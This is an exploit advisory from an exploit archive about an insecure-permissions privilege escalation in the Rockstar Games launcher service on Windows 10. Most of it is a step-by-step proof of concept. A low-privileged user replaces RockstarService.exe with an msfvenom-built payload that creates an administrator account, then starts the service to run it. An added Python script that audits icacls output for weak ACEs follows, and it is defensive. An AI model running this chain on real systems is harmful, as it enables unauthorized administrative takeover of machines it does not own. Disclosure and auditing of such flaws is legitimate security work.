## https://sploitus.com/exploit?id=PACKETSTORM:162068
# Exploit Title: Rockstar Service - Insecure File Permissions  
# Date: 2020-04-02  
# Exploit Author: George Tsimpidas  
# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher  
# Version Patch: 1.0.37.349  
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362  
  
Vulnerability Description:  
  
RockstarService.exe suffers from an elevation of privilege vulnerability that allows an "Authenticated User" to replace the service's existing executable file with a binary of his choice. The vulnerability exists because of a weak set of permissions granted to the "Authenticated Users" group, which holds the (M) flag, i.e. the "Modify" privilege.  
  
#PoC  
  
D:\Launcher> icacls .\Launcher.exe  
  
.\Launcher.exe BUILTIN\Administrators:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
NT AUTHORITY\Authenticated Users:(I)(M)  
BUILTIN\Users:(I)(RX)  
  
#1. Create low privileged user & Login to that user  
  
C:\>net user lowpriv Password123! /add  
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"  
User name lowpriv  
Local Group Memberships *Users  
Global Group memberships *None  
  
#2. Move the RockstarService.exe to a new name  
  
D:\Launcher> move RockstarService.exe RockstarService.exe.bk  
1 file(s) moved.  
  
#3. Create malicious binary on kali linux with MSF  
  
msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe  
  
#4. Transfer created 'RockstarService.exe' to the Windows Host  
  
#5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one  
  
#6. Now start the Service  
  
Command : net start 'Rockstar Service'  
  
Now verify that the user has been registered on the system and added to the local Administrators group  
  
C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full"  
  
User name placebo  
Local Group Memberships *Administrators *Users  
Global Group memberships *None
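
To audit for the weak ACL shown in the icacls output above, the following added example (not part of the original advisory) parses icacls output and reports any allow ACE that gives a non-administrative principal write-class access to the file. The trusted-principal list, the set of rights treated as write-class, and the function names are assumptions made for this example.

```python
import re

# Principals expected to hold write access to a service binary (assumption).
TRUSTED = {"BUILTIN\\Administrators", "NT AUTHORITY\\SYSTEM",
           "NT SERVICE\\TrustedInstaller"}
# icacls rights that permit replacing the file or changing its ACL/owner.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DE", "WDAC", "WO", "GW", "GA"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}  # inheritance markers, not rights
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(output, path):
    """Return (principal, rights, is_deny) for every ACE in icacls output."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):  # first ACE shares its line with the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the icacls summary line
        rights, deny = set(), False
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            tokens = {t.strip() for t in group.split(",")}
            if tokens == {"DENY"}:
                deny = True
            else:
                rights |= tokens - INHERIT_FLAGS
        aces.append((m.group("principal"), rights, deny))
    return aces


def weak_aces(output, path):
    """Allow ACEs that let a non-trusted principal modify the file."""
    return [(p, sorted(r & WRITE_RIGHTS))
            for p, r, deny in parse_icacls(output, path)
            if not deny and p not in TRUSTED and r & WRITE_RIGHTS]


# icacls output copied from the advisory.
SAMPLE = """.\\Launcher.exe BUILTIN\\Administrators:(I)(F)
NT AUTHORITY\\SYSTEM:(I)(F)
NT AUTHORITY\\Authenticated Users:(I)(M)
BUILTIN\\Users:(I)(RX)
"""

if __name__ == "__main__":
    for principal, rights in weak_aces(SAMPLE, ".\\Launcher.exe"):
        print(f"WEAK: {principal} holds {','.join(rights)}")
```

An empty result from weak_aces means only the trusted principals can write to the binary, which is the state a service executable should be in.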